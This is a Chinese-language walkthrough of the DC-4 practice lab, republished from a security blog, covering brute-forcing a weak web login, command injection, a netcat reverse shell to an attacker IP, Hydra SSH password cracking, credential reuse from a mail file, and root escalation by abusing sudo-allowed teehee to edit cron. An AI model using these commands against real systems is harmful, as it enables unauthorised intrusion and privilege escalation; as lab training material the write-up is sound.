首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >DC-4靶场练习(拯救基础学习)

DC-4靶场练习(拯救基础学习)

作者头像
网e渗透安全部
发布2024-11-21 08:17:35
发布2024-11-21 08:17:35
17600
代码可运行
举报
文章被收录于专栏:白安全组白安全组
运行总次数:0
代码可运行

01

DC系列是一套很不错的新手练习靶场,考验了各种基础操作以及知识点。

首先这个靶场没有ifconfig命令,我们需要安装一下

代码语言:javascript
代码运行次数:0
运行
复制
apt install net-tools

然后我们访问这个页面,发现是一个登陆的窗口,其实是弱口令,我们使用burp进行爆破

这里我们因为根据字典的不同,账号是admin,密码是happy

我们利用获取的弱口令登录到后台,发现这里会执行命令查询,那么我们就可以抓包查看一下传递值

我修改一下这里的命令试试

这里+就是代表空格

成功加载了首页面出来,那么我们就来一个nc反弹吧,或者远程下载msf执行也是可以尝试的

代码语言:javascript
代码运行次数:0
运行
复制
nc 192.168.119.135 9989 -e /bin/bash

我们用+将上面的语句连接

然后攻击机开启nc接收,这样就成功反弹回来了

美化一下命令界面

我们查看权限,肯定是不足的

我们到home目录下查看一下

发现又三个人,也就是三个不同用户

我们可以检查一下每个用户目录中的文件,这里简化写

检查到jim中文件的backups目录的时候发现一个旧密码的文件

我们查看发现都是一些密码,我们将这个复制下来,保存到txt文件中

我们使用hydra来破解一下看看,爆破jim这个密码

代码语言:javascript
代码运行次数:0
运行
复制
hydra ssh://192.168.119.161 -l jim -P pd.txt -t 10

我们使用这个账号密码进行ssh登录

代码语言:javascript
代码运行次数:0
运行
复制
ssh jim@192.168.119.161

登录一下输入密码

登录上之后这里提示我们有一个邮件

我们查看这个jim

根据这个邮件我们找到关键的地方就是charles这个用户告诉了jim他的用户密码,也就是说我们可以登录这个用户

复制密码粘贴上去登录成功

我们使用

代码语言:javascript
代码运行次数:0
运行
复制
sudo -l

命令查看sudo能执行的命令

发现这个teehee又root权限

我们来使用设个teehee,使用它来编辑一下定时任务文件

写入让bin/sh赋予可读可写可执行权限

然后我们ctrl+退出编辑

使用

代码语言:javascript
代码运行次数:0
运行
复制
ls -la /bin/sh

验证一下

发现权限ok

那我们直接就可以使用bin/sh进行执行命令

那么到这里就完成了。

总结:

1、使用hydra进行爆破

2、了解一台Linux中不同用户在home下不同的文件夹

3、了解Linux中的邮件

4、使用了teehee进行定时任务编写获取权限

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2024-11-17,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 白安全组 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档